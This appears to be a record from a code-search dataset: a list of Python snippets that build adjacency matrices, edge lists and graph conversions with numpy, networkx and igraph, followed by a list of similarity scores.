{number_row_edges}\" \\\n f\" rows and {number_col_edges} columns found.\"\n\n return {i: (np.nonzero(row)[0]).tolist() for\n i, row in enumerate(adjacency_matrix)}", "def internal_adjacency(self, node_list):\n # Create igraph Graph object describing the subgraph\n subgraph = self.graph.subgraph(node_list)\n # Get adjacency matrix\n return np.array(subgraph.get_adjacency(type=2).data).astype(np.int8)", "def matrix_to_list():\n graph = {\n node: [\n neighbour for neighbour in range(self.rank) if self.matrix[node, neighbour] != inf\n ] for node in range(self.rank)\n }\n return graph", "def to_edge_list(self, interaction_symbol='<->', weights=True):\n return interaction_table_to_edge_list(\n self, interaction_symbol=interaction_symbol, weights=weights\n )", "def interaction_table_to_edge_list(\n interaction_table, interaction_symbol='<->', weights=True\n):\n process_index_intensity = process_index\n if weights:\n process_index_intensity = process_index_with_weights\n return [\n process_index_intensity(index, intensity, interaction_symbol)\n for index, intensity in\n zip(interaction_table.df.index, interaction_table.df['intensity'])\n ]", "def colored_edges(genome):\n edges = []\n for chromo in genome:\n nodes = [0] + chromosome_to_cycle(chromo)\n nodes.append(nodes[1])\n for j in range(1, len(chromo) + 1):\n edges.append((nodes[2 * j], nodes[2 * j + 1]))\n\n return edges", "def __generate_edges(self):\n edges = []\n for vertex in self.__graph_dict:\n for neighbour in self.__graph_dict[vertex]:\n edges.append({vertex, neighbour})\n return edges", "def generate_edges(self):\n edges = []\n for vertex in self.graph_dict:\n for neighbour in self.graph_dict[vertex]:\n if (neighbour, vertex) not in edges:\n edges.append((vertex, neighbour))\n \n for pair in edges:\n for otherpair in edges:\n if pair[1] == otherpair[0]:\n edges.append((pair[0],otherpair[1]))\n return edges", "def edgify(vertices:list)->list:\n edges = []\n for k in range(0, len(vertices) - 1):\n edges.append([vertices[k], vertices[k + 1]])\n return edges", "def convert_sparse_to_igraph(indices, matrix):\n # sources, targets = matrix.nonzero()\n # weights = matrix[sources, targets]\n # weights = np.array(weights)[0]\n # print(dir(louvain))\n # ig = igraph.Graph(zip(sources, targets), directed=True,\n # edge_attrs={'weight': weights})\n # return ig\n g = igraph.Graph.Adjacency((matrix > 0).tolist())\n g.es['weight'] = matrix[matrix.nonzero()]\n # g.vs['label'] = node_names # or a.index/a.columns\n return g", "def adjacencyMatrixplot(nodes):\n adMat = np.zeros((len(nodes), len(nodes)), int)\n for node in nodes:\n if (node.id == 0):continue\n parent, child = node.parent, node.id # -1 -> tally with list indices\n adMat[parent, child] = 1\n return adMat", "def edges(self):\n return [(k, val) for k, v in self.dict.iteritems() for val in v]", "def adj_matrix(self):\n return nx.adj_matrix(self.network)", "def get_edges(graph):\n edges = []\n for vertex in graph.keys():\n connected_nodes = graph[vertex]\n for node in connected_nodes:\n edges.append(str(vertex + node))\n\n return edges", "def read_graph(Amatrix):\n\tG = nx.from_numpy_matrix(Amatrix)\n\tG = G.to_undirected()\n\treturn G", "def adjacency(self):\n if self.E > 0:\n i = self.edges[:, 0]\n j = self.edges[:, 1]\n adj = coo_matrix((np.ones(self.E), (i, j)),\n shape=(self.V, self.V))\n else:\n adj = coo_matrix((self.V, self.V))\n return adj", "def edges(self):\n edges = []\n for key in self:\n if key:\n for edge in self[key]:\n edges.append((key, edge))\n return edges", "def 
__generate_edges(self):\n\n edges = []\n for vertex in self.__graph_dict:\n for neighbour in self.__graph_dict[vertex]:\n if {neighbour, vertex} not in edges:\n edges.append( {vertex,neighbour} )\n return edges", "def generate_edges(self):\n edges = []\n for vertex in self.graph_dict:\n for neighbour in self.graph_dict[vertex]:\n if {neighbour, vertex} not in edges:\n edges.append({neighbour, vertex})\n return edges", "def adj_matrix(G,nodelist=None,weight='weight'):\n return nx.to_numpy_matrix(G,nodelist=nodelist,weight=weight)", "def edges(self):\n edges = []\n for key in self._g:\n if self._g[key]:\n for value in self._g[key]:\n edges.append((key, value))\n return edges", "def path_nodes_to_edges(path):\n \n # Edge sequence initialization\n edge_sequence = []\n \n for i in range(len(path) - 1):\n edge_sequence.append((path[i], path[i+1]))\n \n return edge_sequence", "def __generate_edges(self):\r\n edges = []\r\n for vertex in self.__graph_dict:\r\n for neighbor in self.__graph_dict[vertex]:\r\n if {neighbor, vertex} not in edges:\r\n edges.append({vertex, neighbor})\r\n return edges", "def get_edges(self):\n return_set = set()\n for outer_index, outer_list in enumerate(self._adjmatrix):\n for inner_index, inner_item in enumerate(outer_list):\n if(inner_item):\n return_set.add(\n (self._name[outer_index],\n self._name[inner_index]))\n return return_set", "def edges(self):\n edges = []\n for key in self:\n if key:\n for edge in self[key]:\n edges.append((key, edge, self[key][edge]))\n return edges", "def get_edges(self):\n edges = []\n for (key, target) in self.edges.keys():\n edges.append((key, target))\n return edges", "def edgeAdjacency( gen ):\n if gen == 0:\n return []\n elif gen == 1:\n return [(0,5), (1,8), (2,11)]\n else:\n raise ValueError, \"Hasn't been programmed yet!\"", "def create_graph(matrix):\n g = OrderedDict()\n for i in xrange(matrix.size):\n g[i] = []\n n1, n2 = compute_neighbours(i, matrix)\n if n1:\n g[i].append(n1)\n if n2:\n g[i].append(n2)\n return g", "def path_to_edges(path):\n return list((u, v) for u, v in zip(path[:-1], path[1:]))", "def get_route_edges_from_route(route):\n edges_in_route = []\n\n for i in range(0, len(route) - 1):\n\n edge = route[i], route[i + 1]\n\n edges_in_route.append(edge)\n\n return edges_in_route", "def get_adjacency_matrix(self):\n\n # Get dimension of future matrix\n dim = max([node.value for node in self.nodes])\n\n # Initialize square matrix of zeros\n # Matrix is square and indexes by from, to node values\n adjacency_matrix = [[0 for _ in range(dim+1)] for _ in range(dim+1)]\n\n # Insert edge value at the from, to coordinates\n # That is, fully identify each \"from, edge, to\" triplet\n for edge in self.edges:\n row = edge.node_from.value\n col = edge.node_to.value\n val = edge.value\n\n adjacency_matrix[row][col] = val\n\n # Return matrix of edge values indexed by from, to node values\n return adjacency_matrix", "def calculate_connectivity_matrix(molecule, element_diagonal=False):\n num_atoms = molecule.GetNumAtoms()\n adjacency = np.zeros((num_atoms, num_atoms))\n for bond in molecule.GetBonds():\n bond_type = str(bond.GetBondType()).lower()\n bond_order = get_bond_order(bond_type)\n i = bond.GetBeginAtomIdx()\n j = bond.GetEndAtomIdx()\n adjacency[i, j] = bond_order\n adjacency[j, i] = bond_order\n if element_diagonal:\n for i, atom in enumerate(molecule.GetAtoms()):\n adjacency[i, i] = atom.GetAtomicNum()\n return adjacency", "def get_edges(chromosome):\n edges = []\n for i in range(len(chromosome)):\n for j in 
range(len(chromosome[i]) - 1):\n m = 2 * chromosome[i][j]\n if chromosome[i][j] < 0:\n m = -m - 1\n n = 2 * chromosome[i][j + 1] - 1\n if chromosome[i][j + 1] < 0:\n n = -n -1\n edges.append((m, n))\n m = 2 * chromosome[i][j + 1]\n if chromosome[i][j + 1] < 0:\n m = -m - 1\n n = 2 * chromosome[i][0] - 1\n if chromosome[i][0] < 0:\n n = -n -1\n edges.append((m, n))\n return edges", "def adjacency_matrix(edge_index: nb.int64[:,:],\n n: nb.int64) -> nb.boolean[:,:]:\n adj_mat = np.eye(n, dtype=np.bool_)\n for e in edge_index:\n adj_mat[e[0],e[1]] = True\n return adj_mat", "def __generate_edges(self):\n edges = []\n for vertex in self.__graph_dict:\n for neighbour in self.__graph_dict[vertex]:\n if {neighbour, vertex} not in edges:\n edges.append({vertex, neighbour})\n return edges", "def generate_edge_from_screen():\n weight = 1 # all edges have weight of 1\n edges_lst = []\n for row in range(ROWS):\n for col in range(COLS):\n node_name = get_node_name(row, col)\n # 4 edges:\n set_four_edges(col, row, edges_lst, weight)\n # 2 edge rows or 2 edge columns without the 4 edges:\n set_edge_rows_cols(col, edges_lst, row, weight)\n # else - general case:\n if 0 < row < ROWS - 1 and 0 < col < COLS - 1:\n set_general_edge(col, edges_lst, row, weight)\n return edges_lst", "def make_graph(self):\n # update the neighbors in the graph\n self.update_neighbors()\n\n # Go through each node and get their neighbors\n self.edges = []\n for node_name in self.nodes:\n\n # get the neighbors\n node_neighbors = self.nodes[node_name].neighbors\n\n # go through neighbors\n for neighbor_name in node_neighbors:\n\n # Make the edge key\n edge_key = \"-\".join(sorted([node_name, neighbor_name]))\n\n # Add it to the edge list if it is not already present\n if edge_key not in self.edges:\n\n self.edges.append(edge_key)\n\n return self.edges", "def edges(self):\r\n return [\r\n (parent, child)\r\n for parent in self._children_of\r\n for child in self._children_of[parent]\r\n ]", "def adj2edge(adj):\n adj = adj.tocoo().astype(np.float64)\n row = adj.row\n col = adj.col\n values = adj.data\n edge_weights = torch.Tensor(values)\n edge_index = torch.LongTensor([list(row),list(col)])\n return edge_index, edge_weights", "def convert_to_list(graph):\n result = []\n for i in range(graph.size):\n row = []\n for j in range(graph.size):\n if graph.matrix[i][j]:\n row.append(j)\n result.append(row)\n return result", "def create_adjacency_matrix(self, edges):\n matrix = np.zeros([self.max_words, self.max_words * self.edge_types * 2])\n for edge in edges:\n src = edge[0]\n e_type = edge[1]\n dest = edge[2]\n self.set_matrix(matrix, src, dest, e_type, 1)\n return matrix", "def convert_tree_as_set_to_adjacencies(tree):\n edges = {}\n for i, j in tree:\n if i not in edges:\n edges[i] = [j]\n else:\n edges[i].append(j)\n if j not in edges:\n edges[j] = [i]\n else:\n edges[j].append(i)\n return edges", "def edges(self):\n return [edge(self.vertices[i - 1], self.vertices[(i)]) for i in range(-1, len(self.vertices))]", "def _get_tri_edges(tri):\n return [[tri[1], tri[2]], [tri[2], tri[0]], [tri[0], tri[1]]]", "def edges(self):\n return self.dovetails + self.containments + self.internals", "def edges(self) -> Iterable[Tuple[Node]]:\n edges = []\n for node in self.__graph_dict.keys():\n for neighbour in self.__graph_dict[node]:\n # Since all edges go both ways, we need only return one of them.\n if {neighbour, node} not in edges:\n edges.append({node, neighbour})\n yield (node, neighbour)", "def Adjacency(graph,digraph=False): \n N = 
len(graph.nodes)\n adj = np.zeros((N,N))\n edges = graph.edges\n for a,b in edges:\n adj[a,b] = 1\n if not digraph:\n adj[b,a] = 1\n return adj", "def edges(self) -> Set[Tuple[int, int]] : \n edges : Set[Tuple[int, int]] = set()\n for node_id in self.nodes: # iterator over id's\n for adj_node in self.nodes[node_id]:\n edge = (node_id, adj_node)\n if self.directed:\n edges.add(edge)\n else:\n if edge[::-1] not in edges: # if reverse edge not in edges...\n edges.add(edge)\n return edges", "def get_adj_matrix(self):\n # This is currently implemented for the case when there are only two edge types (edge and no-edge)\n assert self.Z_edges_logits.shape[1] == 2\n Z_edge_logits = self.Z_edges_logits.detach().cpu().numpy() # [num_edges, 2]\n prob = np.exp(Z_edge_logits) / np.sum(np.exp(Z_edge_logits), axis=-1, keepdims=True) # [num_edges, 2]\n adj_matrix = np.zeros((self.num_nodes, self.num_nodes))\n mask = np.ones((self.num_nodes, self.num_nodes), dtype=bool) & ~np.eye(self.num_nodes, dtype=bool)\n adj_matrix[mask] = prob[:, 1]\n return adj_matrix", "def get_edges(self):\n return [tuple(edge) for edge in self._tree.tree_grid[1:3, :].T]", "def formAdjacencyMatrix(self):\n self.adjacencyMatrix = dict()\n for i in self.node:\n self.adjacencyMatrix[i] = dict()\n for j in self.node:\n self.adjacencyMatrix[i][j] = 0\n \n for ij in self.link:\n self.adjacencyMatrix[self.link[ij].tail][self.link[ij].head] = 1", "def edges_to_matrix(edge_list: List[Tuple[int, int]], add_reverse_edges: bool,\n shape: Tuple[int, int], dtype: TypeVar=bool, sparse: bool=True):\n matrix = scipy.sparse.csc_matrix(\n (numpy.ones(len(edge_list)), zip(*edge_list)), dtype=dtype, shape=shape,\n )\n\n if add_reverse_edges:\n matrix = (matrix + matrix.T) > 0\n matrix = matrix.astype(dtype)\n\n if not sparse:\n matrix = matrix.toarray()\n\n return matrix", "def transpose_graph(adj):\n trans_adj = [[] for _ in range(len(adj))]\n\n for i in range(len(adj)):\n for j in adj[i]:\n trans_adj[j].append(i)\n\n return trans_adj", "def findIsland(i, j, matrix):\n visited = [[ False for ele in row] for row in matrix]\n totalEdges = traverseNodes(i, j, matrix, visited)\n\n return totalEdges", "def from_numpy_matrix(self, matrix, node_names=None, directed=False, *args, **kwargs):\n\t\tN = list()\n\t\tE = dict()\n\t\tneighbours = dict()\n\n\t\t# Assert Square Adjacency Matrix\n\t\tif matrix.shape[0] != matrix.shape[1]:\n\t\t\traise ValueError('Adjacency Matrix not square')\n\n\t\t#matrix = matrix.A\n\n\t\tN = list( np.arange(matrix.shape[0]) )\n\t\tfor i, row in enumerate(matrix,start=0):\n\t\t\tneighbours[i] = []\n\t\t\tfor j, value in enumerate(row,start=0):\n\t\t\t\t# the diagonal is (must be) always zero (distance = 0)\n\t\t\t\tif i==j:\n\t\t\t\t\tcontinue\n\t\t\t\t# infinite distance doesn't have to be calculated\n\t\t\t\telif value == np.inf:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tE[ (i,j) ] = float(value)\n\t\t\t\t\tneighbours[i].append(j)\n\n\t\treturn Dijkstra(N, E, neighbours, node_names, directed, *args, **kwargs)", "def path2edge(iterable,graph):\r\n return (graph.es[graph.get_eid(pair[0],pair[1])] for pair in pairwise(iterable))", "def get_adjacency_matrix(self):\n m = zeros(self.size)\n perm = self.array_form\n for i in xrange(self.size - 1):\n m[perm[i], perm[i + 1]] = 1\n return m", "def to_undirected(adjmat):\n num_rows=adjmat.shape[0]\n num_cols=adjmat.shape[1]\n adjmat_directed=np.zeros((num_rows, num_cols), dtype=int)\n tmpadjmat=adjmat.astype(int)\n\n for i in range(num_rows):\n for j in range(num_cols):\n 
adjmat_directed[i, j] = tmpadjmat.iloc[i, j] + tmpadjmat.iloc[j, i]\n\n adjmat_directed=pd.DataFrame(index=adjmat.index, data=adjmat_directed, columns=adjmat.columns, dtype=bool)\n return(adjmat_directed)", "def to_undirected(adjmat):\n num_rows=adjmat.shape[0]\n num_cols=adjmat.shape[1]\n adjmat_directed=np.zeros((num_rows, num_cols), dtype=int)\n tmpadjmat=adjmat.astype(int)\n\n for i in range(num_rows):\n for j in range(num_cols):\n adjmat_directed[i, j] = tmpadjmat.iloc[i, j] + tmpadjmat.iloc[j, i]\n\n adjmat_directed=pd.DataFrame(index=adjmat.index, data=adjmat_directed, columns=adjmat.columns, dtype=bool)\n return(adjmat_directed)", "def edges(self):\n return self.generate_edges()", "def return_adj_nodes(self, node):\n\n return [node.above, node.right, node.below, node.left]", "def generate_full_adj(self):\n edges = np.zeros(shape=(self.n_balls, self.n_balls))\n row_idx = 0 # start filling adjacency mat from root node\n col_idx = 1 # skip the root node and start from 2nd node\n for l in range(self.nl):\n for n in range(self.nn[l]):\n edges[row_idx, col_idx:col_idx + self.nc[l]] = 1\n # Increase counters after filling connections for a parent node\n col_idx += self.nc[l]\n row_idx += 1\n return edges", "def outgoing_edges(self, vertices, labels=True):\n return list(self.outgoing_edge_iterator(vertices, labels=labels))", "def get_edge_ids(self):\n edge_ids = []\n \n for node_id in self.nodes:\n if (isinstance(self.nodes[node_id], EdgeNode)):\n edge_ids.append(node_id)\n \n return edge_ids", "def makeAdjArray(edges):\n adj_array = {}\n for edge in edges:\n if edge[0] not in adj_array.keys():\n adj_array[edge[0]] = [edge[1]]\n else:\n adj_array[edge[0]].append(edge[1])\n return adj_array", "def connectivity_matrix(self):\n # TODO: make this more memory efficient by ordering i,j in code when needed.\n temp = []\n for i in range(self.n_atom):\n for j in range(i+1, self.n_atom):\n if self.bond(i, j):\n temp.append([i+1, j+1])\n self.connect = np.asarray(temp)", "def incoming_edges(self, vertices, labels=True):\n return list(self.incoming_edge_iterator(vertices, labels=labels))", "def get_adjacency_list(self):\n \n # Get maximum node value\n max_index = max([node.value for node in self.nodes])\n \n # Initialize list long enough to reach max_index\n adjacency_list = [None] * (max_index+1)\n\n # Iterate over all edges\n for edge in self.edges:\n\n from_val = edge.node_from.value # Get node from value\n to_val = edge.node_to.value # Get node to value\n edge_val = edge.value # Get edge value\n\n # Store to and edge values at from value index\n # If there's already content stored at index...\n if adjacency_list[from_val]:\n # Append new content\n adjacency_list[from_val].append((to_val, edge_val))\n else:\n # Else, assign new content as a list\n adjacency_list[from_val] = [(to_val, edge_val)]\n \n # Return list of (to value, edge value) tuples indexed by from value\n return adjacency_list", "def matrix2list(vertex_matrix): \n flat_array = vertex_matrix.tolist() \n xy_list = [] \n for i in range(0, len(flat_array)): \n xy_list.append( flat_array[i][0] ) \n xy_list.append( flat_array[i][1] ) \n return xy_list" ]
[ "0.7220524", "0.7194223", "0.710978", "0.68476194", "0.6835649", "0.67063034", "0.67027074", "0.6680238", "0.6674114", "0.6642599", "0.66176134", "0.66089475", "0.6598832", "0.6533455", "0.65062785", "0.64912444", "0.64912444", "0.64545166", "0.6395245", "0.6378416", "0.6347094", "0.6315265", "0.63064957", "0.63022256", "0.629945", "0.6290077", "0.62740105", "0.62577325", "0.6244229", "0.62195337", "0.6215446", "0.61834216", "0.6164052", "0.6160751", "0.6153311", "0.6138986", "0.6114625", "0.6093784", "0.6068388", "0.605901", "0.60211277", "0.601924", "0.6016745", "0.6005025", "0.6004174", "0.599983", "0.599832", "0.599008", "0.5987456", "0.5986549", "0.5985013", "0.59843946", "0.59837186", "0.5976092", "0.5976065", "0.5973348", "0.5965731", "0.5960116", "0.59427994", "0.5937023", "0.5935431", "0.5935244", "0.5917532", "0.5913949", "0.59091526", "0.5909059", "0.59070325", "0.5905889", "0.5899804", "0.58909696", "0.58796847", "0.58777773", "0.5856892", "0.5850081", "0.5826045", "0.5824992", "0.58220994", "0.581805", "0.58118093", "0.5809153", "0.58063185", "0.57867616", "0.5782048", "0.57783306", "0.57584804", "0.5758409", "0.5755211", "0.57444096", "0.5734323", "0.5734323", "0.57111627", "0.5708976", "0.5705469", "0.57005715", "0.5697961", "0.56823486", "0.56812", "0.56727165", "0.5672185", "0.56552887" ]
0.69720167
3
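Illustrative usage of the to_adj_list document in the row above (not part of the dataset; the 4x4 matrix and its values are an assumed example, and the function is taken to be defined in scope).

import numpy as np

adj_matrix = np.array([[0, 1, 0, 1],
                       [1, 0, 1, 0],
                       [0, 1, 0, 0],
                       [1, 0, 0, 0]])

# Only the upper triangle is scanned (jdx starts at idx), so each edge appears once.
print(to_adj_list(adj_matrix))   # -> [[0, 1], [0, 3], [1, 2]]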
Returns a list of successors by vertex, sensitive to the read strand
def get_successor_list(adj_matrix, vertex_map, read_strand): succ_list = [] assert (adj_matrix.shape[0] == adj_matrix.shape[1]) for idx in range(adj_matrix.shape[0]): succ_list.append([]) for jdx in range(adj_matrix.shape[0]): if adj_matrix[idx, jdx] == 1 and \ ((read_strand == "+" and vertex_map[0][idx] <= vertex_map[0][jdx]) or \ (read_strand == "-" and vertex_map[1][idx] >= vertex_map[1][jdx])): succ_list[idx].append(jdx) return succ_list
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_successors(vertex, graph):\n successors = list()\n successors.extend(graph.successors(vertex))\n return successors", "def get_predecessors_successors(vertex, graph):\n overlaps = list()\n pre = get_unique_predecessors(vertex, graph)\n suc = get_unique_successors(vertex, graph)\n overlaps.extend(pre)\n overlaps.extend(suc)\n return overlaps", "def get_unique_successors(vertex, graph):\n suc_nudes_in_stage_i = get_successors(vertex, graph)\n return remove_duplicates(suc_nudes_in_stage_i)", "def get_unique_predecessors_successors(vertex, graph):\n overlaps = get_predecessors_successors(vertex, graph)\n ov_unique = remove_duplicates(overlaps)\n return ov_unique", "def get_successors(self, node):\n succs = []\n parent_state = self.node_to_state(node)\n for it in self.children:\n child_node = (node[0] + it[0], node[1] + it[1])\n child_state = self.node_to_state(child_node)\n edge = self.interpolate(parent_state, child_state, self.distance_bw_states(parent_state, child_state)/self.path_resolution)\n succs.append([child_node, edge])\n return succs", "def _get_rhops(self, vertex: str) -> List[Tuple[str, str]]:\n if isinstance(vertex, rdflib.term.URIRef):\n vertex = Vertex(str(vertex)) # type: ignore\n elif isinstance(vertex, str):\n vertex = Vertex(vertex) # type: ignore\n hops = []\n\n predicates = self._transition_matrix[vertex]\n for pred in predicates:\n assert len(self._transition_matrix[pred]) == 1\n for obj in self._transition_matrix[pred]:\n hops.append((pred, obj))\n return hops", "def out_vertices(self, vertex):\n return self[vertex].keys()", "def get_unique_predecessors(vertex, graph):\n pre_nodes_in_stage_i = get_predecessors(vertex, graph)\n return remove_duplicates(pre_nodes_in_stage_i)", "def get_predecessors(vertex, graph):\n predecessors = list()\n predecessors.extend(graph.predecessors(vertex))\n return predecessors", "def vertices(self):\r\n return self.adjacent.keys()", "def obtener_vertices(self):\n return list(self.vertices.keys())", "def get_predecessors(self, pos: tuple):\n return self.get_successors(pos)", "def vertices_from_lines(lines):\n count = len(lines)\n print(\"Getting vertices 1/3\")\n pb = pbar.ProgressBar(count)\n vertices = []\n# print(\"getting vertices from line\")\n for line in lines:\n pb +=1\n vertices.extend(list(line.coords))\n del pb\n return [Point(p) for p in set(vertices)]", "def getAdjacentVertices(self, vertex):\n return self.adjList[vertex]", "def successors(state):\n free_coordinates = []\n for i in range(3):\n for j in range(3):\n if state[i][j] == '_':\n free_coordinates.append([i, j])\n\n return free_coordinates", "def successors(self, node: Node):\n return iter(self.get_node(node_id) for node_id in node.out_nodes_ids)", "def getStartVertex(self):", "def get_neighbors(self, vertex: Vertex) -> Set[Vertex]:\n if isinstance(vertex, str):\n vertex = Vertex(vertex)\n return self._transition_matrix[vertex]", "def _get_all_accessible_vertex_from_index(self, index: int) -> List[int]:\n # The index is the first one vertex\n visited_vertex = [index]\n vertex_to_visit = [index]\n\n while True:\n # Get next vertex to visit\n current_vertex = vertex_to_visit.pop()\n # Iterate over all vertexes that we can visit\n for vertex in self._graph[current_vertex]:\n if vertex not in visited_vertex:\n visited_vertex.append(vertex)\n vertex_to_visit.append(vertex)\n\n if not vertex_to_visit:\n break\n\n return visited_vertex", "def vertex_generator(self):\n for V in self.Vrepresentation():\n if V.is_vertex():\n yield V", "def return_adjacencies(self, 
vertex: np.int_):\n return self.__adj[vertex]", "def _get_shops(self, vertex: str) -> List[Tuple[str, str]]:\n if not vertex.startswith(\"http://\"):\n return []\n self.endpoint.setQuery(\n \"\"\"\n SELECT ?p ?o WHERE {\n <\"\"\"\n + str(vertex)\n + \"\"\"> ?p ?o .\n }\n \"\"\"\n )\n\n self.endpoint.setReturnFormat(JSON)\n results = self.endpoint.query().convert()\n neighbors = []\n for result in results[\"results\"][\"bindings\"]:\n predicate, obj = result[\"p\"][\"value\"], result[\"o\"][\"value\"]\n if predicate not in self.label_predicates:\n neighbors.append((predicate, obj))\n return neighbors", "def vertices_at_least_once(self):\n clauses = []\n for vertex in range(0,self.graph.num_vertices):\n clauses.append(self.vertex_at_least_once(vertex))\n return clauses", "def get_successors(node, grid):\n successors = []\n\n node_x, node_y = node\n n_rows = len(grid)\n n_cols = len(grid[0])\n\n for dx, dy in product([-1,0,1],[-1,0,1]):\n # skip the current node itself\n if (dx == 0 and dy == 0):\n continue\n\n x = node_x + dx\n y = node_y + dy\n\n if (0 <= x < n_rows and 0 <= y < n_cols):\n cost = grid[y][x]\n else:\n # put infinite penalty on successors that would take us off the edge of the grid\n cost = inf\n\n successors.append( ((x, y), cost) )\n\n return successors", "def get_successors(node, grid):\n successors = []\n\n node_x, node_y = node\n n_rows = len(grid)\n n_cols = len(grid[0])\n\n for dx, dy in product([-1,0,1],[-1,0,1]):\n # skip the current node itself\n if (dx == 0 and dy == 0):\n continue\n\n x = node_x + dx\n y = node_y + dy\n\n if (0 <= x < n_rows and 0 <= y < n_cols):\n cost = grid[y][x]\n else:\n # put infinite penalty on successors that would take us off the edge of the grid\n cost = inf\n\n successors.append( ((x, y), cost) )\n\n return successors", "def get_all_vertices(self):\r\n for vertex in self.__neighbours.keys():\r\n yield vertex", "def vertex_at_most_once(self,vertex):\n clauses = []\n for (p1,p2) in itertools.combinations(range(0,self.graph.num_vertices),2):\n clause = [ ClauseVariable(True,vertex,p1),\n ClauseVariable(True,vertex,p2)]\n clauses.append(clause)\n return clauses", "def vertices(self):\n \n yielded = set()\n \n # Iterate over every tuple of edges, e.g. ..., (1, 2), (4, 3), ...\n for vertices in self.edges():\n # Iterate over every vertex in the tuple, e.g. 
..., 1, 2, 4, 3, ...\n for vertex in vertices:\n # Yield if it has not been yielded already\n if vertex not in yielded:\n yield vertex", "def getSuccessors(self, state):\n\n successors = []\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n # Add a successor state to the successor list if the action is legal\n # Here's a code snippet for figuring out whether a new position hits a wall:\n x, y = state[0]\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n hitsWall = self.walls[nextx][nexty]\n\n if not hitsWall:\n successors.append((((nextx,nexty), self.visited_corner), action, 1))\n \"*** YOUR CODE HERE ***\"\n\n return successors", "def vertices(self):\n return self.keys()", "def vertices_saturating(self, constraint):\n from sage.libs.ppl import C_Polyhedron, Poly_Con_Relation\n result = []\n for i,v in enumerate(self.minimized_generators()):\n v = C_Polyhedron(v)\n if v.relation_with(constraint).implies(Poly_Con_Relation.saturates()):\n result.append(self.vertices()[i])\n return tuple(result)", "def vertex_at_least_once(self,vertex):\n clauses = []\n for position in range(0,self.graph.num_vertices):\n clauses.append(ClauseVariable(False,position,vertex))\n return clauses", "def find_nodes(shp):\n node_count = {}\n for road in shp:\n vrts = road.vertices\n for node in vrts:\n if node not in node_count:\n node_count[node] = 0\n node_count[node] += 1\n node_count[vrts[0]] += 1\n node_count[vrts[-1]] += 1\n return set([node for node,c in node_count.iteritems() if c > 1])", "def canonical_vertex(self):\n return self.L.zero(), self.K.one()", "def hamilton(graph: nx.DiGraph, vertex_count, start_vertex, path=None, visited=None):\n if visited is None:\n visited = []\n\n if path is None:\n path = []\n\n # if start_vertex not in path:\n # path.append(start_vertex)\n\n if len(path) == vertex_count:\n return path\n\n sucessor_vertices = graph.successors(start_vertex)\n\n for successor in sucessor_vertices:\n if successor not in set(visited):\n # Then visit\n visited.append(successor)\n path.append(successor)\n candidate = hamilton(graph, vertex_count, successor, path, visited)\n\n if candidate:\n return candidate\n\n visited.pop()\n path.pop()", "def get_vertices(self):\n return self.vertList.keys()", "def get_conn_component(T, u):\n # Holds vertices, which have been already visited so the algorithm won't\n # process them again\n visited = []\n # Holds the frontier of the explored area. 
Vertices to be visited\n # and expanded are chosen from this list\n frontier = [u]\n\n # Following code is a basic DFS, which collects all vertices it explored\n # Invariant : Visited list keeps its property defined higher\n # Variant : Frontier list being reduced by 1 and then expanded by 0...deg(vertex)\n while len(frontier) != 0:\n vertex = frontier.pop()\n\n # Invariant : Frontier list keeps its property defined higher\n # Variant : child vertex of the one currently being expanded\n for child in T[vertex]:\n if not visited.__contains__(child) and not frontier.__contains__(child):\n frontier.append(child)\n visited.append(vertex)\n\n return visited", "def vertex_iterator(self):\n for X in self.fe.L:\n for x in self.K.unit_group:\n yield (X, x)", "def vertices(self):\n return self.pointlist", "def getSuccessors(self, currentPos, wallList, grid):\n x, y = currentPos\n fourDirections = [(x-1, y, Directions.WEST), (x+1, y, Directions.EAST), \\\n (x, y+1, Directions.NORTH), (x, y-1, Directions.SOUTH)]\n return filter(lambda successorPos: self.isValidPos(successorPos[0], successorPos[1], wallList, grid), fourDirections)", "def get_successors(self):\n \n raise AIError(\"Must be implemented in child class!\")", "def succnodes(self):\n return self._data[1]", "def getSuccessors(self, state):\n successors = []\n x, y = state[0]\n visitedCorners = state[1]\n for action in [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]:\n # Add a successor state to the successor list if the action is legal\n # Here's a code snippet for figuring out whether a new position hits a wall:\n # x,y = currentPosition\n # dx, dy = Actions.directionToVector(action)\n # nextx, nexty = int(x + dx), int(y + dy)\n # hitsWall = self.walls[nextx][nexty]\n\n\n dx, dy = Actions.directionToVector(action)\n nextx, nexty = int(x + dx), int(y + dy)\n hitsWall = self.walls[nextx][nexty]\n if not hitsWall:\n # Initialize a list of Visited corners for a successor using the visited corner list in state space.\n successorVisitedCorners = list(visitedCorners)\n next_node = (nextx, nexty)\n # Add node to the Visited corner list if it is a corner and not already in the list\n if next_node in self.corners:\n if not next_node in successorVisitedCorners:\n successorVisitedCorners.append(next_node)\n # Create a new state according to the state space and append it to the successor list.\n successor = ((next_node, successorVisitedCorners), action, 1)\n successors.append(successor)\n\n self._expanded += 1 # DO NOT CHANGE\n\n return successors", "def get_neighbours(self, vertex):\n output = []\n \n if vertex in self.adjacency_list:\n for neighbour in self.adjacency_list[vertex]:\n output.append([neighbour.vertex.value, neighbour.weight])\n \n return output", "def getSuccessors(self, state):\n\t\tutil.raiseNotDefined()", "def vertices(size):\n return set(range(size))", "def get_vertices(self):\n return list(self.vertices.keys())", "def get_successors(self, task):\n raise NotImplementedError(\"This method should be implemented.\")", "def vertex_adjacencies(self):\n try:\n return self._vertex_adjacencies\n except AttributeError:\n self._vertex_adjacencies = \\\n [ [ v.index(), \n [n.index() for n in v.neighbors()] \n ] for v in self.Vrepresentation() ]\n return self._vertex_adjacencies", "def get_vertices(self) -> []:\n return [i for i in self.adj_list]", "def get_successors(self, sas_task: SASTask) -> Generator:\n operator_names = [operator.name for operator in sas_task.operators]\n random.Random(SEED).shuffle(operator_names)\n for 
